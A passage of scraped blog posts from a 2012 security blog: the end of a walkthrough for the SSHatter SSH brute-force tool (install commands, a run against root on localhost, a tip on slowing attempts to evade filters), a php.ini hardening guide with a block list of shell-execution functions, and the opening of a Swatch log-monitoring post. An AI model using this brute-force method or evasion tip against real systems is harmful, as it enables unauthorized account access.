<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">wget http://freshmeat.net/redir/sshatter/70781/url_tgz/get.php
tar -xvzf SSHatter-0.6.tar.gz
cd SSHatter-0.6/src</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Next you may have to install the following perl libraries.<br style="margin: 0px; padding: 0px;" />Install Parallel::ForkManager<br style="margin: 0px; padding: 0px;" />To install Parallel:::Forkmanager it is easiest to simply download the source from</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
http://search.cpan.org/~dlux/Parallel-ForkManager-0.7.5/ForkManager.pm</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
and compile the module yourself</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">wget http://search.cpan.org/CPAN/authors/id/D/DL/DLUX/Parallel-ForkManager-0.7.5.tar.gz
tar -xvzf Parallel-ForkManager-0.7.5.tar.gz
cd Parallel-ForkManager-0.7.5
perl Makefile.pl
make
sudo make install</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<span id="more-976" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Install Net::SSH-Perl<br style="margin: 0px; padding: 0px;" />This package is usually distributed as a package and can easily be installed on most systems.<br style="margin: 0px; padding: 0px;" />On Fedora use:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">sudo yum install perl-Net-SSH-Perl</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Once you have installed these modules you'll need to create a file full of potential targets and a file of usernames to try. A simple password file is distributed with SSHatter but you may want download and utilize a more extensive one. SSHatter also uses a file of usernames. Again, you can download an extensive file or perhaps tailor this file to the target system. For our purposes we'll simply target localhost and try and brute force the user root.</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">$ perl SSHatter.pl
usage: SSHatter.pl
sleeptime: 0 - disable retries at SSHatter.pl line 62.
$ echo root > users
$ echo 127.0.0.1 > targets
$ perl SSHatter.pl 1 targets users passwords 1 1</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Evaluation</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
The source code to SSHatter is a mere 168 lines, making it rather compact. SSHatter also supports connection attempts to alternate port numbers if the targets are listed with an IP address, then a colon and the port (i.e. 127.0.0.1:20). SSHatter does include the handy functionality of being able to sleep between tries, so you can slow your brute force attempts, which may evade some filters.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
All in all SSHatter is a simple, straightforward tool. It isn't particulary fast, stealthy or easy to use. It doesn't include any advanced functionality such as documentation, randomly generated passwords or a GUI. SSHatter also doesn't have any easy way to configure scans of ranges of IP's and seems to rely on a pre-built target list. SSHatter is also distributed as copyrighted material, rather than as GPL material, which will probably limit any sort of participation or active development community.</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-2392734758090832232012-07-16T14:30:00.002+06:002012-07-16T14:31:03.118+06:00PHP Security, Securing php.ini<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="title" style="background-color: transparent; border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; line-height: 22px; margin: 16px 0px 10px 50px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<span style="color: #666666;"><span style="font-size: 12px;"><br /></span></span></div>
<div class="clear" style="background-color: transparent; border: 0px; clear: both; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 16px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
</div>
<div class="entry" style="background-color: transparent; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; overflow: hidden; padding: 10px 20px 0px; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<a href="http://1.bp.blogspot.com/-S-TuJfGUOGM/TZhHIFtEFmI/AAAAAAAAAQM/oKP0hp4GeD8/s1600/img-secure.png" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="" border="0" class="alignleft" height="173" src="http://1.bp.blogspot.com/-S-TuJfGUOGM/TZhHIFtEFmI/AAAAAAAAAQM/oKP0hp4GeD8/s1600/img-secure.png" style="background-color: transparent; border: 0pt none; display: inline; float: left; margin: 0px 6px 2px 0px; outline: 0px; padding: 3px; vertical-align: baseline;" width="173" /></a>Php.ini is PHP’s default configuration file.This file is generally found in etc/php.ini on many Linux systems.This file contains a host of functionality that is used to secure web applications.Many php users and admins are unfamiliar with the various options that are available with php.ini. By tweaking a few security related options in the file you can strengthen the web application running on it.</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">PHP SAFE MODE </strong><br style="margin: 0px; padding: 0px;" />PHP safe mode is a comprehensive “attempt to solve the shared server security problem” that includes many useful features. Safe mode effectively checks if functions in one file on the server that affect other files all have the same ownership. For instance, if you have a page saurav.php that attempts to read the contents of a directory img/. Safe mode with check the UID of saurav.php and the img/ directory. If they match then the script will be allowed access, if they don’t match then safe mode will disable access. This is an interesting security mechanism that allows you to restrict access by scripts outside of the normal application installation directory. Safe mode may cause problems though when the web server ends up owning files (for example when a new file is uploaded or created by an application it is usually owned by ‘apache’ or a similar web server account).</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span id="more-1355" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span></div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Safe mode will also restrict executables that may be executed by scripts in the same way it restricts file and directory access. Safe mode can also be configured so that only executables in a certain directory can be run. This can help limit exposure of shell commands to certain scripts.<br style="margin: 0px; padding: 0px;" />To enable safe mode, the safe mode directive in the php.ini to:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">safe_mode = On</pre>
</blockquote>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
In some cases you’ll want to use a group to check ownership. To have safe mode check group permissions use:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">safe_mode_gid = On</pre>
</blockquote>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
If you want to limit directories that can contain included files or executables use the following php.ini directives respectively:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">safe_mode_include_dir = /path/to/dir
safe_mode_exec_dir = /path/to/exec/dir</pre>
</blockquote>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Safe mode has several other useful features that are worth looking into.go to their website to learn more</div>
<h4 style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-size: 15px; margin: 0px 0px 5px; outline: 0px; padding: 0px; vertical-align: baseline;">
Restricting Includes</h4>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Using the open_basedir directive in PHP makes a lot of sense given most file include vulnerability vectors. This directive limits all PHP file operations to the listed directory and below. It is common for attackers to search for ways to include local files in PHP scripts to expose local filesystem files through the web server. For instance, if an attacker found a file inclusion vulnerability they might try to include the /etc/passwd file to enumerate all the user accounts on the system. With the open_basedir directive PHP can restrict file inclusion to the web root, for instance /var/www. Once set files outside that directory cannot be included in scripts, and thus the aforementioned attack would fail. To enable the open_basedir directive update your php.ini file to include:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </strong>open_basedir = /path/to/web/root</pre>
</blockquote>
<h4 style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-size: 15px; margin: 0px 0px 5px; outline: 0px; padding: 0px; vertical-align: baseline;">
Disabling Functionality</h4>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
There are certain functions in PHP that you probably don’t want your developers to use because of the danger they pose. Even if you know your users aren’t utilizing certain functions it is wise to completely disable them so an attacker can’t use them. This security precaution is especially effective at stopping an attacker who has somehow managed to upload a PHP script, write one to the filesystem, or even include a remote PHP file. By disabling functionality you ensure that you can limit the effectiveness of these types of attacks. It should be noted that it is virtually impossible to do something like preventing an attacker from executing a command at a shell by disabling functions, but it can certainly stop an attacker who isn’t a skillful PHP programmer.</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo</div>
</blockquote>
<h4 style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-size: 15px; margin: 0px 0px 5px; outline: 0px; padding: 0px; vertical-align: baseline;">
Preventing Information Disclosure</h4>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Attackers will often use information that your web server exposes in order to gain information about the server configuration, application layout, and components. Error messages are some of the most common paths to information disclosure, often leaking information such as application installation path, database connectivity, data model details such as table and column names, and script details such as variables. While this debugging information is invaluable to developers it is useless to end users and dangerous to expose to attackers. PHP debugging output should be disabled in the php.ini using:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">display_errors = Off</pre>
</blockquote>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
This prevents PHP from showing run time errors in pages served to users. PHP will continue to log the errors as normal, however, so they can be reviewed by developers. Be wary of developer tactics to end run PHP errors, however, as disabling this functionality does not prevent information disclosure. Some developers may use custom debugging output nested in HTML comments, third party tools like <a href="http://www.firephp.org/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="FirePHP - Firebugs style debugging with PHP and AJAX">FirePHP</a>, or writing PHP error logs to local directories using .htaccess files and the error_log directive. However, by preventing the display of errors by default you reduce the possibility of exposing information to attackers.</div>
<h4 style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-size: 15px; margin: 0px 0px 5px; outline: 0px; padding: 0px; vertical-align: baseline;">
Disable Globals</h4>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Global variables are a horrible hold over from the PHP 3 days. In most distributions register global variables is set to off (and thankfully it won’t be supported in future versions of PHP). However, you should ensure that the directive is properly in place. You should find the following in your php.ini file:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">register_globals = Off</pre>
</blockquote>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Register globals allows various HTTP variables to be used without specifying their source. For instance, if a developer wants to use a URL variable named ‘id’, for instance from the URL request index.php?id=4, with globals they can simply use $id rather than $_GET['id']. This is a great convenience but it can cause collisions. For instance, if a form post uses a variable called ‘id’ and there is a variable $id defined in a script and a user alters the URL of the script to include an ‘id=’ in the URL which variable has precedence? Even more damaging is the ability of attackers to override configuration variables such as DOCUMENT_ROOT from the URL. This can cause no end of problems, especially if attackers are able to call scripts that are normally included in other scripts and expect predefined variables, which could be overwritten via GET variables by an attacker.<br style="margin: 0px; padding: 0px;" />Many legacy applications may require globally registered variables. If this is the case at least limit the configuration to specific application directories rather than throughout your PHP installation. You can do this using PHP directives in .htaccess files included in specific directories. Ensure that register_globals is set to Off, however, in your php.ini configuration!</div>
<h4 style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-size: 15px; margin: 0px 0px 5px; outline: 0px; padding: 0px; vertical-align: baseline;">
Disable Remote File Includes</h4>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Attackers will often attempt to identify file inclusion vulnerabilities in applications then use them to include malicious PHP scripts that they write. Even if an attacker doesn’t have write access to the web application directories if remote file inclusion is enabled the attacker can host malicious PHP scripts on other servers and the web application will fetch them and execute them locally! This can have devastating consequences. To restrict remote file execution be sure the following appears in your php.ini file:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">allow_url_fopen = Off
allow_url_include = Off</pre>
</blockquote>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
This prevents remote scripts from being included and executed by scripts on your system.</div>
<h4 style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-size: 15px; margin: 0px 0px 5px; outline: 0px; padding: 0px; vertical-align: baseline;">
Restrict File Uploads</h4>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
If you’re not utilizing file upload functionality in any of your PHP scripts then it’s a good idea to turn it off. Attackers will attempt to (mis)use file uploads to quickly inject malicious scripts into your web applications. By disabling file uploads altogether this makes moving scripts onto your web server more difficult. To disable file uploads change the file_uploads directive in your php.ini to read:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">file_uploads = Off</pre>
</blockquote>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Even if you do allow file uploads you should change the default temporary directory used for file uploads. This can be done by changing the upload_tmp_dir directive. You may also want to restrict the size of files that can be uploaded. This is usually more of a system administration alteration than a security fix, but it can be useful. Use the upload_max_filesize directive for this purpose. To restrict upload directories and file sizes change your php.ini so that it reads:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">upload_tmp_dir = /var/php_tmp
upload_max_filezize = 2M</pre>
</blockquote>
<h4 style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-size: 15px; margin: 0px 0px 5px; outline: 0px; padding: 0px; vertical-align: baseline;">
Protect Session Cookies</h4>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Session stealing is a popular attack that allows a malicious user to hijack the session of a legitimate user. Using session hijacking an attacker can bypass authorization and access portions of web applications without authorization. PHP uses strong (meaning long pseudo randomly generated) session identifiers so that guessing a session id is extremely difficult. When logging into a PHP application you can view your cookies and likely identify a cookie with an name like ‘phpsessid’ and a value similar to ‘bbbca6bb7a23bdc8de3baef2b506e654′. The cookie is composed of 32 hexadecimal characters, making it extremely hard to predict. The flaw in this system, however, is that these session identifiers are written to the filesystem when they’re created so PHP can keep track of them. Changing the default location of these session identifiers will confound some attempts to read them. To change the location where session information is written alter the session.save_path in the php.ini configuration so that it points to your desired location like so:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">session.save_path = /var/lib/php</pre>
</blockquote>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Make sure that the web server can read and write to the location you specify, however, or sessions won’t work. You may also wish to set PHP so that it writes cookies in such a way that they are inaccessible to JavaScript. If you don’t have any PHP applications that utilize JavaScript to manipulate cookies this is a great idea. Attackers will often exploit Cross Site Scripting (XSS) flaws in web applications to inject JavaScript into pages, which could be used to steal session cookies. By setting the php.ini directive:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">session.cookie_httponly = 1</pre>
</blockquote>
<div style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
you restrict JavaScript from accessing your cookies. Another small security feature is allowing PHP to check HTTP referer values so that session information is only passed internally while a user is viewing an application. This prevents users from accidentally publishing session information in a way that would allow external users to follow links and steal a session. This is especially useful if session information is being passed in a URL that could accidentally be published to a mailing list or web site. To enable this functionality use the following in your php.ini:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; vertical-align: baseline;">
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">session.referer_check = your_url.tld</pre>
</blockquote>
</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-66675108913293979692012-07-16T14:28:00.002+06:002012-07-16T14:28:41.886+06:00Automated log monitoring with email notifications using Swatch<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
The swatch program (simple watcher) can monitor all sorts of logs and respond to certain events when they occur. Its concept is quite simple. Swatch will monitor a logfile for us , for example, /var/log/syslog, and when a specific event occurs (these events are configured in the swatch config file) and are logged in the log file, swatch can respond by executing a program, sending an email to a sysadmin or sending messages to the console where swatch is being run.</div>
